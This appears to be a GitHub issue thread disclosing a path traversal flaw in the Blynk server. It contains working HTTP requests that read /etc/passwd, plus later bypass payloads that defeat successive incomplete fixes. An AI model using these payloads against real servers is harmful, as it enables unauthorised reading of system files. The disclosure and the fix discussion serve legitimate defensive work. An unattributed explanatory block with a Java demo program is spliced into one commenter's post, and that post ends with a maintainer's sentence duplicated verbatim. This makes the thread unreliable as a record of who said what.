
Path operation vulnerability #1256

Closed
OldFRE opened this Issue Sep 30, 2018 · 8 comments


OldFRE commented Sep 30, 2018

1. Start the software normally
e.g. java -jar server-0.39.6-java8.jar -dataFolder Blynk/

2. Access the path and capture the packets
Modify the HTTP request packet
e.g. 1

GET /static/../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.169.1:9443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


e.g. 2

GET /static/js/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.169.1:9443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.169.1:9443/admin
Cookie: session=f14e5805-5870-46f9-8959-b2655945721b


You can access /etc/passwd.


Thank you very much !


doom369 (Collaborator) commented Sep 30, 2018

@OldFRE thanks! Fixed. Please let me know if you expect any reward from us (dmitriy@blynk.cc)

@doom369 doom369 closed this Sep 30, 2018


OldFRE commented Sep 30, 2018

Thank you very much. If there is a reward, can I pay with PayPal?
My PayPal (1562574225@qq.com)
If not, then no use. I really want to trouble you!


blynkkk (Owner) commented Sep 30, 2018

Thank you! We sent you a small appreciation for your effort. 🙏


OldFRE commented Sep 30, 2018

Thank you very much. Thank you very much for your reward! ;)


svnk42 commented Oct 1, 2018

> @OldFRE thanks! Fixed. Please let me know if you expect any reward from us (dmitriy@blynk.cc)

Hi there,

I noticed that the implemented fix is not sufficient. Path traversal is still possible e.g. via
GET /static/js/./..././..././..././..././..././..././..././..././.../etc/passwd
in the latest version 0.39.7


doom369 (Collaborator) commented Oct 1, 2018

@svnk42 thanks! Build updated.


harupu commented Oct 3, 2018

Hi there,

It seems path traversal is still possible.

uri = uri.replace("/.", "");

This replace just removes /. and still allows a bypass with //... like below:

static//...//...//...//...//...//...//...//.../etc/passwd

To remove the path traversal attack vector by using replace, we must check for /.. again after replacing, like below:

while (uri.indexOf("../") != -1) {
    uri = uri.replace("../", "");
}

I think using getCanonicalPath() is a better way to check for path traversal attacks.
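As an added illustration of harupu's point (example code, not the Blynk server's own), the following Java program compares the single-pass `replace("/.", "")` filter quoted above with a canonical-path check, using the request paths from this thread. The static root is a constructed directory under the JVM's temp folder; only its existence matters.

```java
import java.io.File;
import java.io.IOException;

public class StaticPathCheck {

    // The single-pass filter quoted in this thread: strips "/." left to right, once.
    static String naiveFilter(String uri) {
        return uri.replace("/.", "");
    }

    // Canonical-path check: resolve the path the server is actually about to open and
    // require it to be the static root itself or something strictly below it.
    // Returns the canonical File on success, null when the path escapes the root.
    static File resolveUnderRoot(File staticRoot, String requestPath) throws IOException {
        String rootCanon = staticRoot.getCanonicalPath();
        File candidate = new File(staticRoot, requestPath).getCanonicalFile();
        String canon = candidate.getPath();
        // The trailing separator stops a sibling such as ".../static2" matching ".../static".
        if (canon.equals(rootCanon) || canon.startsWith(rootCanon + File.separator)) {
            return candidate;
        }
        return null;
    }

    public static void main(String[] args) throws IOException {
        // Constructed static root for the demo (assumption: java.io.tmpdir is writable).
        File root = new File(System.getProperty("java.io.tmpdir"), "static-demo");
        root.mkdirs();

        String[] samples = {                       // request paths taken from this thread
            "js/app.js",
            "../../../../../../../../etc/passwd",
            "//...//...//...//.../etc/passwd",     // harupu's bypass of the "/." filter
        };
        for (String raw : samples) {
            // "..." is an ordinary directory name, so the raw bypass path stays inside the
            // root; it is the filter that turns "//..." into "/.." and creates the escape.
            String filtered = naiveFilter(raw);
            System.out.printf("%-40s raw: %-8s filtered as %-28s %s%n",
                    raw,
                    resolveUnderRoot(root, raw) != null ? "inside" : "ESCAPES",
                    filtered,
                    resolveUnderRoot(root, filtered) != null ? "inside" : "ESCAPES");
        }
    }
}
```

The check must run on the final path handed to the filesystem, after any rewriting the handler performs, otherwise the rewrite itself can reintroduce the traversal.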

I know it requires a more solid fix, will fix it when I have more time. Anyway, if you find something else, please let me know.

doom369 (Collaborator) commented Oct 3, 2018

@harupu thanks! Build updated.
I know it requires a more solid fix, will fix it when I have more time. Anyway, if you find something else, please let me know.
